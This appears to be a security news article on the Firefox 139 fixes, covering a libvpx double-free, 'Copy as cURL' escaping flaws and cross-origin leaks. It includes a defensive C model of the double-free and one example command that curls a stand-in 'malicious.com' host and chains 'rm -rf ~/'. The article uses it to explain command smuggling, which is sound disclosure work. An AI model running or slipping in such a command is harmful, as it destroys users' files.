Zero-Interaction libvpx Flaw in Firefox Allows Attackers to Run Arbitrary Code

Mozilla has released Firefox 139, addressing several critical and moderate security vulnerabilities that posed significant risks to users.

The update, announced on May 27, 2025, resolves issues ranging from memory corruption and local code execution to cross-origin data leaks, reinforcing Firefox’s commitment to user safety.

Double-Free in libvpx Encoder:

One of the most severe vulnerabilities fixed in Firefox 139 is a double-free bug in the libvpx encoder, specifically within the vpx_codec_enc_init_multi function used by WebRTC.

Reported by Randell Jesup, this flaw could trigger a double-free scenario after a failed memory allocation during encoder initialization.

The result: potential memory corruption and a crash that can be exploited for arbitrary code execution—an impact rated as critical by Mozilla.

Technical Details:

  • Vulnerability Type: Double-free
  • Component: libvpx encoder (WebRTC)
  • Function: vpx_codec_enc_init_multi
  • Potential Impact: Memory corruption, remote code execution

A double-free occurs when a program attempts to free the same memory location twice, leading to undefined behavior and often exploitable crashes.

Attackers exploiting this bug could potentially execute malicious code on a user’s system without any user interaction beyond normal browsing.
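The failure mode described above (an initializer that frees memory on a failed allocation, followed by a caller that cleans up the same context) can be shown with a small model. This is an added example, not libvpx or Firefox code: the `enc_ctx` structure, the `enc_*` functions and the pool allocator are hypothetical, and the pool counts a repeated free instead of corrupting a real heap.

```c
#include <stdio.h>
/* Constructed pool allocator: records a repeated free instead of corrupting a heap. */
enum { SLOTS = 4, SLOT_SIZE = 64 };
static char pool[SLOTS][SLOT_SIZE];
static int in_use[SLOTS], double_frees, allocs_left;

static void *pool_alloc(void) {
    if (allocs_left-- <= 0) return NULL;          /* simulated allocation failure */
    for (int i = 0; i < SLOTS; i++)
        if (!in_use[i]) { in_use[i] = 1; return pool[i]; }
    return NULL;
}
static void pool_free(void *p) {
    if (!p) return;
    int i = (int)(((char *)p - &pool[0][0]) / SLOT_SIZE);
    if (!in_use[i]) { double_frees++; return; }   /* second free of the same block */
    in_use[i] = 0;
}
typedef struct { void *priv, *frame_buf; } enc_ctx;   /* hypothetical context */

static void enc_destroy(enc_ctx *c) {
    pool_free(c->frame_buf);
    pool_free(c->priv);
    c->frame_buf = c->priv = NULL;                /* makes destroy idempotent */
}
/* Flawed: error path frees priv but leaves the stale pointer in the context. */
static int enc_init_flawed(enc_ctx *c) {
    c->priv = pool_alloc();
    c->frame_buf = pool_alloc();
    if (!c->priv || !c->frame_buf) { pool_free(c->priv); return -1; }
    return 0;
}
/* Hardened: error path goes through enc_destroy, which clears the pointers. */
static int enc_init_fixed(enc_ctx *c) {
    c->priv = pool_alloc();
    c->frame_buf = pool_alloc();
    if (!c->priv || !c->frame_buf) { enc_destroy(c); return -1; }
    return 0;
}
/* Caller that cleans up after a failed init; returns the double frees observed. */
static int run(int (*init)(enc_ctx *)) {
    enc_ctx c = {0};
    double_frees = 0;
    allocs_left = 1;                              /* second allocation fails */
    if (init(&c) != 0) enc_destroy(&c);
    return double_frees;
}
int main(void) {
    printf("flawed=%d fixed=%d\n", run(enc_init_flawed), run(enc_init_fixed));
    return 0;
}
```

Giving cleanup a single owner and nulling freed pointers is the general mitigation; builds with AddressSanitizer report the same condition on a real heap.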

Local Code Execution via “Copy as cURL”

Firefox 139 also patches multiple moderate severity vulnerabilities, including two distinct flaws in the “Copy as cURL” developer tool feature.

Both were reported by Ameen Basha M K:

  • CVE-2025-5264: Insufficient escaping of newline characters allowed attackers to craft malicious commands. If a user copies and executes such a command, it could lead to local code execution.
  • CVE-2025-5265: On Windows, insufficient escaping of the ampersand character in the same feature created a similar risk, but this bug was platform-specific to Firefox for Windows.

Example of Risky Command:

    curl "http://malicious.com" && rm -rf ~/

If newline or ampersand characters are not properly escaped, an attacker could append destructive shell commands, tricking users into executing them.

Additional moderate vulnerabilities include:

  • CVE-2025-5263: Improper isolation of script execution error handling, enabling cross-origin leak attacks.
  • CVE-2025-5266: Script element events leaking cross-origin resource status, facilitating XS-Leaks attacks.
  • CVE-2025-5268, CVE-2025-5272: Memory safety bugs that could enable arbitrary code execution if exploited.

Low Impact Issues and Security Enhancements

While most vulnerabilities addressed in Firefox 139 are critical or moderate, several low-impact flaws were also fixed:

  • CVE-2025-5270: In some cases, Server Name Indication (SNI) could be sent unencrypted even with encrypted DNS enabled, potentially exposing browsing metadata.
  • CVE-2025-5271: The DevTools preview feature ignored Content Security Policy (CSP) headers, opening the door to content injection attacks.
  • CVE-2025-5267: A clickjacking vulnerability could have led to leaking saved payment card details to malicious sites.

Risk Factors Table

| Vulnerability ID | Component/Feature | Impact Level | Potential Risk | Platform Affected |
|---|---|---|---|---|
| MFSA-TMP-2025-0001 | libvpx encoder | Critical | Memory corruption, code execution | All |
| CVE-2025-5263 | Script execution | Moderate | Cross-origin leak attacks | All |
| CVE-2025-5264 | Copy as cURL (newline) | Moderate | Local code execution | All |
| CVE-2025-5265 | Copy as cURL (ampersand) | Moderate | Local code execution | Windows only |
| CVE-2025-5266 | Script elements | Moderate | XS-Leaks attacks | All |
| CVE-2025-5270 | SNI encryption | Low | Metadata exposure | All |
| CVE-2025-5271 | DevTools preview | Low | Content injection | All |
| CVE-2025-5267 | Clickjacking | Low | Payment card data leak | All |
| CVE-2025-5268/5272 | Memory safety bugs | Moderate | Memory corruption, code execution | All |

Firefox 139’s security update demonstrates Mozilla’s proactive approach to mitigating both critical and moderate threats.

Users are strongly encouraged to update to the latest version to benefit from these essential security fixes and maintain a secure browsing environment.
